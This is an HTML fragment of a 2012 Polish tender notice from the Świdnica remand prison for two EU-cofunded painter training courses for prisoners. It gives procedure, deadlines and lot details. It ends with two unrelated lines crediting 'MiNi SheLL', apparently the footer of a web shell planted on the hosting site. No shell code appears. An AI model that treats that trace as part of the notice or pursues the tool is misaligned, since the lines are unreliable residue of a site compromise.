<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy w Świdnicy 
ul. Trybunalska 16
58-100 Świdnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 11:00, miejsce: Sekretariat Aresztu Śledczego w Świdnicy
ul. Trybunalska 16
58-100 Świdnica.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kursy są organizowane w ramach Projektu p.n. Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowanego przez Centralny Zarząd Służby Więziennej. Projekt ten jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie kursu malarza wraz z zajęciami aktywizacji zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET I:
Przeprowadzenie kursu: malarz wraz z zajęciami aktywizacji zawodowej - jeden cykl
Miejsce szkolenia - Areszt Śledczy w Świdnicy 
Ilość godzin zajęć teoretycznych kursu: 20
Ilość godzin zajęć praktycznych kursu: 50
Ilość godzin aktywizacji zawodowej: 20 (w tym zajęcia z doradcą zawodowym i liderem klubu pracy)
Ilość uczestników kursu i aktywizacji zawodowej: 12 osób pozbawionych wolności
Termin realizacji zamówienia: 14.11 -7.12.2012 (wskazane jest rozpoczęcie zajęć 14.11.2012 roku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przeprowadzenie kursu malarz wraz z zajęciami aktywizacji zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie kursu: malarz wraz z zajęciami aktywizacji zawodowej - jeden cykl
Miejsce szkolenia - Areszt Śledczy w Świdnicy 
Ilość godzin zajęć teoretycznych kursu: 20
Ilość godzin zajęć praktycznych kursu: 50
Ilość godzin aktywizacji zawodowej: 20 (w tym zajęcia z doradcą zawodowym i liderem klubu pracy)
Ilość uczestników kursu i aktywizacji zawodowej: 12 osób pozbawionych wolności
Termin realizacji zamówienia: 26.11 -19.12.2012 (wskazane jest rozpoczęcie zajęć 26.11.2012 roku).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 26.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com